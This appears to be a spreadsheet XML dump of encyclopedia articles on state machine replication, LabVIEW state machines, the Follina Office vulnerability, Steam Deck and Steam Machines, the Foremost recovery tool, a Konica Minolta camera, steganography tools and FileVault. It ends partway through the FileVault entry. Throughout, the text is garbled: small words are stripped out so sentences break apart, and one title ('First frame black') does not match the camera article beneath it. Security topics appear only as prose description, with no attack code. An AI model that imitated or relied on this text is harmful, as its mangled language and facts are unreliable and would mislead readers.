non-faulty replicas remove quitting replica system upon processing input. during time, replica ignore protocol messages. majority non-faulty replicas remain, quit successful. not, system failure. joining after quitting, failed server selectively restart re-join system. likewise, administrator replica group additional capacity. input added state machine called join. replica submits command system like client request. non-faulty replicas joining node system upon processing input. replica must up-to-date system's state joining (see state transfer). state transfer when replica made available replica restarted, must brought current state processing inputs (see joining). logically, requires applying every input dawn system appropriate order. typical deployments short-circuit logical flow performing state transfer recent checkpoint (see checkpoints). this involves directly copying state replica another using out-of-band protocol. checkpoint large, requiring extended transfer period. during time, inputs added log. occurs, replica must also receive inputs apply checkpoint received. typical deployments replica observer ordering protocol beginning state transfer, allowing replica collect inputs period. optimizing state transfer common deployments reduce state transfer times sending state components differ. this requires knowledge state machine internals. since state transfer usually out-of-band protocol, assumption difficult achieve. compression another feature commonly added state transfer protocols, reducing size total transfer. leader election (for paxos) paxos protocol solving consensus, used protocol implementing consensus order. paxos requires single leader ensure liveness. that replicas must remain leader long enough achieve consensus next operation state machine. system behavior unaffected leader changes every instance, leader changes multiple times instance. requirement replica remains leader long enough move system forward. conflict resolution general, leader necessary disagreement operation perform, operations conflict (for instance, commute).when conflicting operations proposed, leader acts single authority record straight, defining order operations, allowing system make progress. with paxos, multiple replicas believe leaders time. this property makes leader election paxos simple, algorithm guarantees 'eventual leader' work. historical background number researchers published articles replicated state machine approach early 1980s. anita borg described implementation fault tolerant operating system based replicated state machines 1983 paper message system supporting fault tolerance". leslie lamport also proposed state machine approach, 1984 paper "using time instead timeout distributed systems". fred schneider later elaborated approach paper "implementing fault-tolerant services using state machine approach: tutorial". birman developed virtual synchrony model series papers published 1985 1987. primary reference work "exploiting virtual synchrony distributed systems", describes isis toolkit, system used build york swiss stock exchanges, french traffic control system, navy aegis warship, applications. recent work miguel castro barbara liskov used state machine approach call "practical byzantine fault tolerance" architecture replicates especially sensitive services using version lamport's original state machine approach, optimizations substantially improve performance. most recently, also created bft-smart library, high-performance byzantine fault-tolerant state machine replication library developed java. this library implements protocol similar pbft's, plus complementary protocols offer state transfer on-the-fly reconfiguration hosts (i.e., join leave operations). bft-smart recent effort implement state machine replication, still actively maintained. raft, consensus based algorithm, developed 2013. motivated pbft, tendermint introduced partial asynchronous networks mainly used proof stake blockchains. references external links replicated state machines video techtv apache bookkeeper replicated service used build replicated state machines</t>
  </si>
  <si>
    <t>State machine (LabVIEW programming)</t>
  </si>
  <si>
    <t>state machine type programming technique used majority different programming languages. state machine especially important flexible tool used labview programming coding easy maintain, document reuse. introduction state machines state machines revolve around concepts: state, event, action. state position status program working problem. example, state could waiting user something, running calculation. states work help break picture help make everything smoother. developing wisely help make state machine efficiently. events occurrences specific meaning program itself. example building vending machine dispenses item user inserted correct amount money. event program could money inserted person hitting start button. action program react particular event occurred. state machines labview labview, state machines even powerful. state machine help program respond intelligently different types data user could help explain feature, simple vending machine program help illustrate technique. common devices state machine labview state machines started simply creating loop case structure located within loop. loop special constant wired called enumerated constant. enumerated constant constant word phrase changed simple integer number cases user would like have. doing makes programming easier user understand instead looking number codes looking words describing going state machine also relies heavily shift registers. shift register used pass information around loop. example, shift register start information worked loop. after work finished, value saved shift register used start loop next time. next programmer tasks case individually. after initial enumerated constant created, often worth make type definition (commonly referred type def.). making enumerated constant type def. allows user continue copy original re-use program, like normal control except type def., changing instance changes them. type def. allows program much robust makes much simpler change something needs added. simple vending-machine example vending-machine example using shift registers pass around total amount money machine enumerated constants control case when look start-case picture, shift registers left right side enumerated constants middle. also bottom picture used display individual section written indicator. this, remove possibility user getting loop locking case supposed when start stage program, want make sure user right program. this case holds user start menu block diagram, shown below, user hits start button. once start button pressed, program sent next case (called "insert money" case). once "insert money" case, user held continue adding money total shift registers buttons money every time them. this main case, work done vending machine real possible, without adding actual coins, every case work running background. once user finished adding money, press "finished inserting money" button move "dispense" case. "insert money case" also changes displayed "insert change" block diagram. here user insert money also much money "total change inserted" display. "dispense" case starts first checking make sure user inserted enough money item. there second case structure case handle options either enough money, enough money. enough money system, message saying thank purchasing item, amount money takes purchase item subtracted total amount money system. enough money system, program outputs message saying enough money sends money previously inserted moving "end" case. block diagram "dispense" case "end" case picture. there really nothing user really besides messages program output. "end" case simple case works simply delay program allow user enough time check received change picked item. after 5000 milliseconds seconds) wait timer used, program continues back start page wait another user come begin process again. benefits state machine often used easy quickly start remove parts program. state machines work fashion also help keep developer organized work. references</t>
  </si>
  <si>
    <t>Follina (security vulnerability)</t>
  </si>
  <si>
    <t>follina name given remote code execution (rce) vulnerability, type arbitrary code execution (ace) exploit, microsoft support diagnostic tool (msdt) first widely publicized 2022, security research group called sec. this exploit allows remote attacker microsoft office document template execute code msdt. this works exploiting ability microsoft office document templates download additional content remote server. size downloaded content large enough causes buffer overflow allowing payload powershell code executed without explicit notification user. microsoft issued cve-2022-30190 guidance users disable msdt. malicious actors observed exploiting attack computers russia belarus since april, believed chinese state actors exploiting attack tibetan government exile based india. microsoft patched vulnerability june 2022 patches. also exploit (computer security) software references</t>
  </si>
  <si>
    <t>Steam Deck</t>
  </si>
  <si>
    <t>steam deck handheld gaming computer developed valve. released february 2022, steam deck played handheld connected monitor manner nintendo switch. x86-64-v3 device integrated gaming inputs designed play full steam library, including windows games linux-based proton compatibility layer. system open platform, allowing users install compatible games device operating systems. history valve's first foray hardware steam machine, computer specification based linux-derived steamos could adopted computer manufacturer make systems optimized running steam games introduced 2015, platform sell well valve quietly pulled back april 2018, stated remained committed providing type open-hardware platform. steam deck designer scott dalton said "there always kind classic chicken problem steam machine", required adoption linux gamers game developers reach critical interest machines draw manufacturers making them. lack linux game availability lifetime steam machines valve invest development proton, linux-based compatibility layer allow windows-based applications games linux without modification.other factors steam machine line worked conception steam deck. steam controller developed valve part steam machine line. some early prototypes controller included small screen within middle controller could programmed second screen alongside game user playing. idea prototype include steam link, hardware device capable streaming game content computer running steam different monitor, routing output small controller. this later considered valve early concept behind steam deck. further, experience trying convince manufacturers produce steam machines valve realize better develop hardware internally. dalton said, "more became kind clear, internally, kind make complete package."as valve considered options bringing handheld device market, priority device able play nearly entirety steam game library, rejected possible hardware moved away standard x86-based processing structure would easier implement handheld form would limited games would available. only recent discussions current product lines valve able identify technical approach would meet goal handheld device capable playing steam games without overtaxing processor unit. developers considered steam deck future-proof. while specifications modest compared high-end gaming computers, felt performance good place would acceptable many years, still looking newer software improvements, addition amd's fidelityfx super resolution (fsr). though current designs successor, valve stated would likely future iterations hardware years come, company expects timing releases depend current state processor technology handheld device limitations rather regular upgrade cycle.rumors valve working portable gaming unit emerged 2021, based updates made within steam code pointing towards "steampal" device, comments made gabe newell related valve developing games consoles. technica able confirm hardware development valve.valve revealed steam deck july 2021. deck, existing three different models based internal storage options, shipped starting february 2022 north america europe, regions follow throughout year. however, popularity, pre-order purchasers informed later shipments model nvme models would 2022 nvme model 2022. valve informed pre-purchasers november 2021 ongoing global chip shortage, device would fail ship december instead would ship february 2022, retaining order delivery based pre-order placement.valve's ceo, gabe newell, said steam deck's approach, gamer, product i've always wanted. game developer, mobile device i've always wanted partners." according newell, wanted "very aggressive" release pricing strategy considered mobile market primary competitor deck. however, focus unit's performance; newell stated, "but first thing performance experience, [that] biggest fundamental constraint driving this." newell recognized base pricing somewhat higher expected "painful", necessary meet expectation gamers would want deck. newell continued believed product category personal computer hardware valve computer manufacturers would continue participate steam deck proved successful, thus necessary keep unit's price point reasonable demonstrate viability. openness system also feature according newell, defining "superpower" personal computer space typical console systems. newell want limitations user could hardware, installing alternate non-steam software it.pre-orders steam deck opened announcement. pre-orders limited steam accounts opened june 2021 prevent resellers controlling access device. first-day pre-order reservations steam storefront briefly crashed servers demand. september 2021, development kits steam deck shipping developers. device released february 2022. hardware steam deck includes custom accelerated processing unit (apu) built based rdna architectures, named aerith, final fantasy character aerith gainsborough. runs four-core/eight-thread unit runs eight compute units total estimated performance tflops. both variable timing frequencies, running based current processor needs. valve stated comparable performance ryzen 3000 desktop computer processors performance radeon 6000 series. deck includes lpddr5 quad-channel configuration, total bandwidth gb/s. deck's main unit designed handheld use. includes 7-inch (180 touchscreen display 1280×800 pixel resolution fixed refresh rate; games configured vertical synchronization possible. unit's input features thumbsticks, directional pad, abxy buttons, shoulder buttons side unit, four additional buttons rear unit, well trackpads thumbstick. thumbsticks trackpads capacitive sensing, unit includes gyroscope allow specialized controls handheld mode. unit also includes haptic feedback.the unit shipped three models based internal storage options. base model includes emmc internal storage unit, running express mid-tier model includes storage nvme device, high-end unit includes nvme storage unit, latter shipping drives express skus utilize 2230 interface internal storage. valve stated built-in storage meant replaceable end-users, though replaced necessary repair. additional storage space available microsd card slot, also supports microsdxc microsdhc formats.the deck supports bluetooth connectivity input devices, including common game controllers, includes integrated wifi network support meet ieee 802.11a/b/g/n/ac standards. deck supports stereo sound digital signal processor includes integrated microphone headphone jack. deck includes watt-hour battery, valve estimates "lighter cases like game streaming, smaller games, browsing" last seven eight hours. valve estimated keeping frame rates around frames second (fps) intensive games portal could played five hours. system's software includes optional limiter balance game's performance optimize battery life.at release, steam decks manufactured black casing reduce complexity production, though valve stated considered introducing case colors themes future. valve partnered ifixit provide replacement parts users.a dock unit available months deck's release 2022. dock unit connected external power source power deck, external monitor either hdmi displayport protocols route output deck monitor. though limited processor speed, display output deck dock reach high resolution resolution resolution boost also achieved attaching deck directly hdmi adapter without docking station. there change performance steam deck whether docked used portable mode. dock also supports ethernet network connectivity support connections controllers input devices. deck also work third-party docking station supports similar types interfacing portable devices. external gpus supported. software steam deck runs modified arch linux operating system called steamos v3.0. while steamos previously developed steam machines using debian linux, valve stated wanted rolling upgrade approach deck's system software, function debian designed feature arch linux. application programming interface (api) specific steam deck available game developers, allowing game specify certain settings steam deck compared normal computer. within steam storefront, developers populate special file depot game lower-resolution textures reduced elements allow game perform better steam deck; steam automatically detects downloads appropriate files system (whether computer steam deck) user installs game.the steamos software includes support proton, compatibility layer allows games developed windows played linux-based steamos. according protondb, user-run database compiles information game compatibility steam games within linux using proton, several steam's popular game releases compatible proton primarily anti-circumvention anti-cheat controls digital rights management (drm). valve stated working vendors middleware solutions improve proton support also encouraging linux-specific versions developed. epic games' easy anti-cheat, popular anti-cheat options developers, made available macos linux systems september 2021, epic stated developers could easily transition proton layer. valve worked epic 2021 make transition easy anti-cheat proton simple developers. another popular anti-cheat solution, battleye, also affirmed software ready work proton layer required developers opt-in enable valve stated testing games otherwise currently available linux compatible proton layer, find game failed meet minimum frames-per-second performance handheld, performance metric comparable consoles eighth generation. proton layer includes support amd's upscaling technology fidelityfx super resolution (fsr); proton also supports nvidia's dlss upscaling solution, included deck.due potential confusion game compatibility, valve introduced process october 2021 brought additional staff review games steam order make sure game fully playable steam deck. games confirmed compatible steam deck, including proton middleware solutions, default meet minimum performance specifications, marked "verified". games require user tinkering settings, system control bring on-screen keyboard, tagged "playable". another category, "unsupported", games valve tested fully compatible steam deck, games games using windows-specific codecs made compatible proton. these ratings change time steam deck software improves well updates made developers games improve compatibility steam deck software. steam client deck runs revised version steam client desktops. unlike steam's picture mode designed television screens, treated separate software branch within valve, deck version steam client stays consistent desktop version, adding functions interface elements make navigating steam easier controller input, indicators typical portable systems battery life wireless connectivity. valve anticipates phasing picture mode steam steam deck user interface future. version steam deck otherwise supports functions steam, including user profiles friends lists, access game communities, cloud saving, steam workshop support, remote play feature. remote play also allows steam deck used controller game running computer, providing additional control options beyond traditional keyboard mouse common controller systems. steam software deck also supports suspending game progress, feature considered valve core deck. otherwise, games take advantage steam deck handheld's controller input automatically converted them. example, touch-sensitive controllers deck translate input appropriately games typically rely keyboard mouse controls. valve added steam's current approach cloud saving introduction dynamic cloud sync january 2022. prior cloud functionality synchronized game saves user exited game; developers enable dynamic cloud sync cloud saving game running, making feature amenable portable steam deck.users download games onto steam deck store either internal storage card, storage device treated separate steam library games. this allows cards different steam libraries swapped out. valve exploring ability pre-load games card outside deck, personal computer.while deck designed playing steam-based games, loaded third-party software, alternative storefronts like epic games store, ubisoft connect, origin. user also choose replace steamos different operating system entirely, supports multi-booting. device's built-in browser supports xbox cloud gaming, allowing xbox game pass subscriptions access library games. microsoft released version microsoft edge linux improved support xbox cloud gaming well google stadia. newell stated valve would support microsoft bringing xbox game pass steam steam deck want route.as part steam deck's launch, valve released aperture desk job, spinoff game portal series, free march 2022, available windows linux/steamos users. game designed demonstrate various features steam deck, though still playable controller systems.to assist developing testing software steam deck, valve released steamos devkit client server open-source licenses.drivers windows provided valve amd, valve provide support them. reception initial reaction announcement steam deck positive. epic games' sweeney xbox game studios' phil spencer complimented valve steam deck, sweeney calling "amazing move valve!" spencer congratulated valve getting many excited able take games wherever decide play".many outlets compared unit nintendo switch, generally recognized first true hybrid video game console. valve stated really consider switch designing deck, "tried make decisions really steam deck targeted audience served customers already good time interacting games platform, platform", happenstance, came device similar function switch. verge stated generally, steam deck powerful machine compared switch, power came tradeoff battery life greater switch. further, verge recognized specifications deck comparable power consoles eighth generation like xbox playstation though using recent compute/micro- graphics architectures powered older systems. kotaku stated deck switch similar concept, competing devices target demographics, switch aimed broad audience machine, deck geared towards "hardcore" gamers. digital foundry noted deck's hardware powerful, developers necessarily able low-level access cpu/gpu developers working switch proton emulation layer.one main criticisms steam deck highlighted multiple reviewers battery life. matt hanson writing techradar stated, "less welcome fact battery life steam deck pretty poor, managing half hours playing war" "unfortunately time steam deck, battery life issue." expanded saying "that’s going upset people planning using steam deck long flights, example" certainly makes portable gaming system feel less… well, portable." matt miller writing game informer said "battery life significant problem" device's battery life "punishingly low". steve hogarty writing independent said "the battery life steam deck’s biggest weakness. handheld chugs juice like it’s going fashion, graphically demanding games draining full charge little hours playtime." seth macy writing wrote similar terms, saying, "beyond limitation, biggest, deflating issue i’ve battery life. it’s place probably biggest reality check comes realizing dream truly untethered gaming." terms resolving problem richard leadbetter writing eurogamer said "can't help feel elements like noise battery life resolved revised processor efficient process node." references external links official website</t>
  </si>
  <si>
    <t>Foremost (software)</t>
  </si>
  <si>
    <t>foremost forensic data recovery program linux used recover files using headers, footers, data structures process known file carving. although written enforcement use, freely available used general data recovery tool. history foremost created march 2001 duplicate functionality program carvthis linux platform. foremost originally written special agents kris kendall jesse kornblum u.s. force office special investigations. 2005, program modified nick mikus, research associate naval postgraduate school's center information systems security studies research part master's thesis. these modifications included improvements foremost's accuracy extraction rates. functionality foremost designed ignore type underlying filesystem directly read copy portions drive computer's memory. takes portions segment time, using process known file carving searches memory file header type matches ones found foremost's configuration file. when match found, writes header data following file, stopping either footer found, file size limit reached.foremost used command-line interface, graphical user interface option available. able recover specific filetypes, including jpg, gif, png, bmp, avi, exe, mpg, wav, riff, wmv, mov, pdf, ole, doc, zip, rar, htm, cpp. there configuration file (usually found /usr/local/etc/foremost.conf) used define additional file types.foremost used recover data image files, directly hard drives ext3, ntfs, filesystems. foremost also used computer recover data iphones. also list free open source software packages references</t>
  </si>
  <si>
    <t>First frame black</t>
  </si>
  <si>
    <t>maxxum labelled dynax europe/hong kong digital japan officially named "dg-7d", megapixel digital single-lens reflex camera, dslr, produced konica minolta. model dslr range; maxxum/dynax consumer-grade model other. first announced 2004-02-12 show, full details released 2004 photokina show 2004-09-15. production camera released late 2004. production ceased konica minolta announced exit camera business january 2006. regardless high specification (for time) innovative feature set, came high price tag. available body only, also lens; 17-35mm f/2.8. like nikon 18-70 lens found many nikon dslrs, lens regarded high enough quality justice sensor within body, unlike cheap zoom lenses found many dslrs. 2006 sony acquired konica-minolta camera business although remaining inventory continued sold, alongside based sony α100. release, camera retailed around £1000 gbp; somewhere nikon d300 canon 40d. physical features features magnesium alloy body, plastic rear, primarily external controls. body includes external controls exposure compensation, flash compensation, focus mode, shooting mode, exposure mode, drive mode, metering mode, white balance, focal area, iso, dials used control shutter speed f-stop. presence external controls functions encourage experimentation without traverse menus. 7d's 2.5-inch also doubles control lcd. rather second, status located elsewhere like canon nikon dslrs, displays information exposure settings, aperture, shutter speed, battery life, miscellaneous recording information. lcd, acting control lcd, also rotates based rotation camera keep information shown upright. anti-shake technology konica minolta maxxum/dynax come konica minolta's anti-shake technology. major difference konica minolta's anti-shake canon's image stabilization operation done camera rather inside lens, thus making effects usable regardless lens attached. canon's lens floating element used redirect frame based outside movement. konica minolta's however, floating plane controlled actuators work based detected outside movement create inverse movement, thereby keeping line image. firmware issues factory firmware initially shipped (version 1.00) included performance related camera issues affected initial reviews. next build firmware (version 1.10) gave great improvement camera performance dpreview revised initial review retract couple main negative points, citing true speeds 25mbit/s 7.5mbit/s), blinking highlights camera's built-in playback mode, addition remote storage function transfer modes, faster times writing memory cards. other problems problem appeared afflict point working lives: development "first frame black" "error period used, first frame turned dark. sony fixed problem, private camera shops, however parts caused problem longer available. first frame blank often simple process turning back though lead blank frames time. another significant problem misalignment sensor, sensor stuck positions take counteract camera shake fails completely often piezo actuators 'shake' sensor. there chugging sound picture taken. repairs prohibitive still available specialist centers. konica minolta sony july 2005, konica minolta announced partnership sony research develop camera technologies. following march, konica minolta announced withdrawal camera business altogether transferred camera assets sony march 2006. sony's line alpha dslr cameras built upon digital maxxum line, keeping many features made maxxum popular, notably built-in anti-shake technology. sony dslr cameras came support minolta mount lens system makes newer sony-built lenses compatible maxxum bodies maxxum lenses compatible newer sony bodies. also list minolta products minolta a-mount system references external links media related konica minolta dynax wikimedia commons dpreview reviews dynax/maxxum search function images posted flickr.com taken dynax/maxxum personal review maxxum</t>
  </si>
  <si>
    <t>Steam Machine (computer)</t>
  </si>
  <si>
    <t>steam machine series prebuilt small form factor gaming computers designed operate valve's steamos provide game console-like experience. several computer vendors engaged valve develop versions steam machines retail, offering additional options atop valve's requirements dual-booting options microsoft windows ability upgrade computer. support steam machine steamos, valve released steam controller, customizable game controller touchpad-based haptic feedback, steam link, device allows consumers steam software stream content monitor. following two-year testing period, steam machines related hardware released november 2015. 2018, many steam machines models longer offered steam store. history steam, large digital store-front video games supporting many third-party developers publishers, developed valve primarily microsoft windows accounts estimated digitally purchased games platform. valve indicated displeasure approaches microsoft apple taking respective operating systems, limiting applications could run, upon release windows 2012, valve's gabe newell called catastrophe everyone space", discussed possibility promoting open-source operating system linux would maintain "the openness platform". newell recognized games would need significant part push linux. official linux client steam released july 2012, along developer tools help port games platform. valve worked assure users' game libraries would portable, including offering steam play whereby purchase title platform automatically allows user play title supported platforms, cross-platform multiplayer features. prior valve's official announcement steam machines, rumors valve's plan hardware market developed industry throughout 2012, based aspects emphasis linux operating system introduction features like 10-foot user interface "big picture mode" steam would necessary feature video game console. valve formally announced considering developing video game console near 2012. industry journalists tentatively called hardware "steam box". would function dedicated unit running steam allow players launch games, media, functions client already provides. unit's hardware expected tightly controlled similar manner video game consoles. software side expected remain open; example, unit expected ship linux operating system, user able install microsoft windows want gabe newell explained valve's strategy develop single hardware unit default model, internally named "bigfoot", work computer manufacturers want offer user experience different hardware configurations offered valve's model; example, valve expect include optical drive size cost, could feature offered manufacturing partner. also envisioned software enable screencast capabilities, allowing single work monitor television within home. newell stated would also likely develop controllers unit integrate biometrics data player options gaze tracking, citing involuntary responses player useful forms player input motion control. newell also explained valve also considering mobile device market addition home console market, specifically considering laptops tablets hardware nicknamed "littlefoot". during steam days january 2014, valve explained initial target market steam machines living room build demand support linux versions games continue work away windows operating systems future.at 2013 consumer electronics show, modular computer hardware company corporation introduced prototype modular codenamed "piston". this unit several possible designs valve looking default hardware model steam box, specifically designed steam linux support picture mode. unit based xi3's "performance level" model slightly larger human hand, containing various ports connect power, video, data signals. began taking pre-orders piston console 2013 south southwest festival march 2013, anticipating high levels interest hardware plans release unit general purchase 2013. valve clarified although conducted initial exploratory work xi3, direct involvement piston's specifications, necessarily representative final design steam box.valve officially revealed steam machines including related steamos steam controller last week september 2013, tentative release date mid-2014. december 2013, three hundred beta units steam machine shipped selected beta testers initial testing. additional 2000 units provided developers attending steam days event january 2014. valve also released early restricted download link steamos "linux hackers" out. based feedback testers, valve announced 2014 pushed back anticipated release november 2015. first steam machines, steam controllers, steam links available consumer purchase delivery starting november 2015.several gaming websites observed april 2018, valve longer offered links steam machine section steam storefront, could reached directly url, many models previously offered longer listed. valve responded recognized steam machines selling well little user traffic, prompting make change storefront. valve stated remained committed open gaming platform continue develop back-end technologies like steamos help efforts.valve later revealed steam deck 2021, handheld computer designed play steam games running arch linux-based steamos. some design factors steam deck resulted development failure steam machines. difficult developers build linux systems reach thresholds adaption convince manufacturers produce steam machines, valve invested proton, compatibility layer linux microsoft windows-based application games. hesitation manufacturing partners steam machines also valve keep development steam deck internal build better product. hardware hardware units unlike gaming consoles, steam machine specific configuration hardware, minimum specification computer hardware components would needed support steamos operating system games developed valve plans several different retail versions steam machine various hardware manufacturers, also allow users create units components modify retail products off-the-shelf parts desired. units expected arrive 2014, valve expecting announce partners first line 2014 consumer electronics show early january.valve began running beta-testing program late 2013, selecting steam users test optimized prototype hardware units initial versions steam controllers. initial prototypes sent testers various configurations, representative final steam machine specifications. configurations include: cpu: intel core i7-4770, i5-4570, graphics card: nvidia geforce titan, 780, 760, gddr5 main ram: ddr3-1600 hard drive: storage/8 cache hybrid drive power: power supply measurement: 12.4" 2.9" high (30.5 31.5 cm)a core part machine configurations method providing ventilation cooling cpu, gpu, power supply; valve engineered custom compartments within beta units three units separate circulation ventilation routes.valve also worked develop certify hardware future steam machines. portables handheld game console version steam machine development "smach previously dubbed "smach zero" "steamboy" analogy nintendo's game boy. smach released november 2016 combine steam architecture based g-series chip portable form factor input elements similar steam controller. kickstarter crowdfunding campaign launched december 2015, canceled days later promise restart. kickstarter campaign launched october 2016, much lower goal, successfully ended total €474,530 month later. processor raven ridge v1605b, release date sometime april 2017. indemand indiegogo campaign launched following kickstarter campaign. smach approved valve official steam machine. 2021, smach team announced filing bankruptcy, units aren’t likely shipped unless investment. valve announced portable console steam named steam deck july 15th, 2021, shipping slated begin december 2021. steam controller steam controller released november 2015. steam controller designed valve games developed controllers, also games traditionally played keyboard mouse controls. features high-resolution clickable touchpads (replacing typical thumbsticks modern console controllers), sixteen buttons, including face, shoulder, undergrip buttons, gyroscopic sensors motion control. touchpads include haptic feedback, send tactile feedback player reaction events within game; chris kohler wired described using controller playing civilization press event valve, noted used touchpad move mouse cursor, electromagnets within controller created audio tactile feedback using trackball. although controller designed steam machine platform, also used steam existing pcs.the controller designed used within steam's picture mode; enables player access detailed options setting various features controller per-game basis including button/touchpad mapping sensitivity, well accessing users' shared controller configuration themselves. steamworks provides means developers provide detailed settings steam controller picture mode. outside picture mode, controller otherwise behaves standard two-stick controller. valve added improvements controller's capabilities based public feedback, include movement aiming controls schemes using internal gyroscope, ability trigger actions enable cursor movement limited certain regions (such manipulate game's mini-map), quick-access popup commands similar hotkeys keyboard-and-mouse games, cloud-based controller configuration saving, support non-steam games otherwise played steam overlay.unlike current plans third-party hardware vendors manufacture steam machines, valve plans remain sole manufacturer steam controller. valve clarify open specifications third-party controllers developed. march 2016, valve released computer aided design geometry files steam controller, facilitate hardware modding users. december 2015, valve working flextronics robotic assembly line buffalo grove, illinois assemble machines; jokingly, machines given aperture science branding, fictional company valve's portal series. vendor support selected manufacturers showcased prototype units prior 2014 show. ibuypower announced prototype model powered discrete r9-270 500gb hard drive price $499. digital storm also revealed higher-end unit utilizing liquid-cooled parts, expected retail $1,500. other vendors steam machine prototypes include alienware, falcon northwest, cyberpowerpc, origin gigabyte, materiel.net, webhallen, alternate, next, zotac, scan computers, maingear, whom, except maingear, showcased prototypes 2014 show. price range first machines ranged $499 $6,000 based vendor specifications.alienware announced plan start selling consumer steam machines september 2014. company currently plans offer fixed hardware units cannot modified user, plan offering configurations annual basis. initial units, called alpha, initially ship steamos, operating system ready time, come windows 8.1, steam, additional features developed cooperation alienware valve allow steam features like picture mode interface alienware's hardware. owners able upgrade units steamos officially released.on official release steam machines november 2015, falcon northwest origin opted ship steamos-enabled machine 2015 limitations steamos windows; falcon northwest said still consider shipping machines steamos future performance improves.valve negotiated deals retail stores gamestop, games game create steam sections within stores various steam machines, steam controller link, pre-paid steam cards sold. software steamos steam machines, minimum, steamos, linux-based operating system derived debian expands current steam client additional functionality media sharing, media services, steam in-home streaming, family sharing, parental controls. operating system freely available user install hardware, assuming meets system requirements. games applications games developed natively linux steamos. linux compatibility already feature offered steamworks application programming interface (api), according paradox interactive, recent games designed work steam linux also steamos without additional modifications. valve make games exclusive steamos steam machines, cautioned third-party developers making games exclusive platform. however, valve stop developers making steamos-exclusive games, particularly best suited playing living room. players also able stream games regular running steam steam machines, allowing access games available windows through steamplay, users play games available steamos already windows need repurchase title. also, games running steam machine streamed steam link device wireless connection. reception june 2016, seven months official release, fewer half million units sold. response sales figures, technica described unit dead arrival. valve release actual sales figure. while vendors still offer steam machine options, configurations installed steamos, vendors discontinued products 2016.in article published july 2017, gamer lists several factors steam machines take valve anticipated. steamos seen ready everyday gaming initial builds valve unresponsive times towards steam machine makers release updates, concurrently, microsoft announced free rollout windows making incentive valve's software. valve also delayed steam controller release 2015, also subsequently delayed steam machine release. further, steam machine makers felt steam link, produced valve, competed concept steam machines much cost-attractive product. cases steam machine vendors simply found great market product, since trying bridge consoles home computers, found consumers would flock extreme other.in march 2020, newell said "the [steam machine] hardware pushing super-incomplete time." stated steam machines impacted valve's design valve index half life: alyx "designing hardware software concert other." references external links official website</t>
  </si>
  <si>
    <t>Steganography tools</t>
  </si>
  <si>
    <t>steganography software tool allows user embed hidden data inside carrier file, image video, later extract data. necessary conceal message original file all. thus, necessary modify original file thus, difficult detect anything. given section subjected successive bitwise manipulation generate cyphertext, evidence original file show used encrypt file. architecture carrier carrier signal, stream, data file hidden data hidden making subtle modifications. examples include audio files, image files, documents, executable files. practice, carrier look work original unmodified carrier, appear benign anyone inspecting certain properties raise suspicion file carrying hidden data: hidden data large relative carrier content, empty document megabyte size. obsolete formats poorly-supported extensions break commonly used tools. cryptographic requirement carrier (e.g. photo) original, copy something publicly available (e.g., downloaded). this publicly available source data could compared version hidden message embedded. there weaker requirement embedded message change carrier's statistics metrics) presence message detectable. instance, least-significant-bits camera-pixel channel image gaussian distribution given constant colored field, simple image steganography produces random distribution bits could allow discrimination stego images unchanged ones. sheer volume modern 2014) inane high-bandwidth media (e.g., youtube.com, bittorrent sources. ebay, facebook, spam, etc.) provides ample opportunity covert information±. chain hidden data split among files, producing carrier chain, property carriers must available, unmodified, processed correct order order retrieve hidden data. this additional security feature usually achieved using different initialization vector carrier storing inside processed carriers cryptedivn crypt( ivn, cryptedivn-1 using different cryptography algorithm carrier choosing chain-order-dependent equiprobabilistic algorithm robustness cryptography steganography tools ensure robustness modern forensic methods, statistical steganalysis. such robustness achieved balanced stream-based cryptography process; data whitening process; encoding process.if data detected, cryptography also helps minimize resulting damage, since data exposed, fact secret transmitted. sender forced decrypt data discovered, deniable encryption leveraged make decrypted data appear benign. strong steganography software relies multi-layered architecture deep, documented obfuscation process. carrier engine carrier engine core steganography tool. different file formats modified different ways, order covertly insert hidden data inside them. processing algorithms include: injection (suspicious content-unrelated file size increment) generation (suspicious traceability generated carriers) ancillary data metadata substitution adaptive substitution frequency space manipulation also articles kharrazi, mehdi; sencar, husrev memon, nasir (2006). "performance study common image steganography steganalysis techniques" (pdf). journal electronic imaging. (4): 041104. doi:10.1117/1.2400672. retrieved february 2021. guillermito. "analyzing steganography software". retrieved november 2012. provos, niels; honeyman, peter (2003). "hide seek: introduction steganography" (pdf). ieee security privacy. (3): 32–44. doi:10.1109/msecp.2003.1203220. issn 1540-7993. retrieved november 2012. provos, niels. "defending statistical steganalysis". proceedings 10th conference usenix security symposium. ssym'01. usenix association. 24–37. retrieved november 2012. bierbrauer, jürgen; fridrich, jessica. "constructing good covering codes applications steganography" (pdf). transactions data hiding multimedia security iii. lecture notes computer science. 4920: 1–22. retrieved february 2021. rocha, anderson; goldenstein, siome, steganography steganalysis: past, present, future (pdf), first ieee workitorial vision unseen (wvu'08), retrieved march 2017 references external links exhaustive directory steganography software neil johnson</t>
  </si>
  <si>
    <t>FileVault</t>
  </si>
  <si>
    <t>filevault disk encryption program 10.3 (2003) later. performs on-the-fly encryption volumes computers. versions features filevault introduced panther (10.3), could applied user's home directory, startup volume. operating system uses encrypted sparse disk image large single file) present volume home directory. leopard snow leopard modern sparse bundle disk images spread data files (called bands) within bundle. apple refers original iteration filevault legacy filevault.mac lion (10.7) newer offer filevault significant redesign. this encrypts entire startup volume typically includes home directory, abandoning disk image approach. approach disk encryption, authorised users' information loaded separate non-encrypted boot volume (partition/slice type apple_boot). filevault original version filevault added panther encrypt user's home directory. master passwords recovery keys when filevault enabled system invites user create master password computer. user password forgotten, master password recovery used decrypt files instead. migration migration filevault home directories subject limitations: must prior migration target computer target must existing user accounts.if migration assistant already used user accounts target: migration, filevault must disabled source.if transferring filevault data previous uses 10.4 using built-in utility move data machine, data continues stored sparse image format, user must turn filevault re-encrypt sparse bundle format. manual encryption instead using filevault encrypt user's home directory, using disk utility user create encrypted disk image store subset home directory (for example, ~/documents/private). this encrypted image behaves similar filevault encrypted home directory, user's maintenance. encrypting part user's home directory might problematic applications need access encrypted files, available user mounts encrypted image. this mitigated certain extent making symbolic links specific files. limitations issues backups without server, time machine back filevault home directory user logged out. cases, time machine limited backing home directory entirety. using server time machine destination, backups filevault home directories occur users logged because filevault restricts ways users' processes access user's content, third party backup solutions back contents user's filevault home directory parts computer (including users' home directories) excluded. issues several shortcomings identified legacy filevault. security broken cracking either 1024-bit 3des-ede. legacy filevault used mode operation (see disk encryption theory); filevault uses stronger xts-aesw mode. another issue storage keys macos "safe sleep" mode. study published 2008 found data remanence dynamic random-access memory (dram), data retention seconds minutes room temperature much longer times memory chips cooled temperature. study authors able cold boot attack recover cryptographic keys several popular disk encryption systems, including filevault, taking advantage redundancy keys stored expanded efficient use, scheduling. authors recommend computers powered down, rather left 